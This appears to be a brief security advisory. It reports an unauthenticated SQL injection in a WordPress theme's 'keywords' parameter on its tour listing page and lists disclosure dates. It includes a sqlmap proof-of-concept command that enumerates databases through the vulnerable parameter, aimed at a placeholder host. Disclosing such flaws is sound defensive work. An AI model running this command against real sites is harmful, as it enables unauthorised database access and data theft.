The theme did not sanitise, validate of escape the keywords GET parameter from its listing page before using it in a SQL statement, leading to an Unauthenticated SQL injection issue
sqlmap --url="https://example.com/tour-list/?keywords=13&start_date=13" --random-agent -dbs --level=3 --threads=4 --dbms=MySQL -p keywords
2021-04-26 (about 1 years ago)
2021-04-29 (about 1 years ago)
2021-05-17 (about 1 years ago)